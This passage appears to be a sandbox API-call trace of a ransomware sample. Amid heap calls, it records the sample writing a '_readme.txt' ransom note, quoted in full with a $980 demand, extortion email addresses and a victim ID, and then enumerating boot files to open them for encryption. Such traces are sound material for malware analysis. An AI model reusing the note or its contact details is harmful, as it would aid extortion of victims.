(HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.993] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0183.993] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.993] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.993] PathFindFileNameW (pszPath="") returned="" [0183.993] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0183.994] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0183.994] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.994] FreeLibrary (hLibModule=0x759a0000) returned 1 [0183.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.995] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0183.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.995] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0183.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0183.995] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.996] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0183.996] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0183.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0183.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.997] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*" (normalized: "c:\\boot\\nb-no\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0183.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.998] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.998] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.998] PathFindExtensionW (pszPath="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned=".mui" [0183.998] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.004] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.004] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0184.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0184.005] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0184.005] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.006] HeapFree (in: hHeap=0x2c0000, 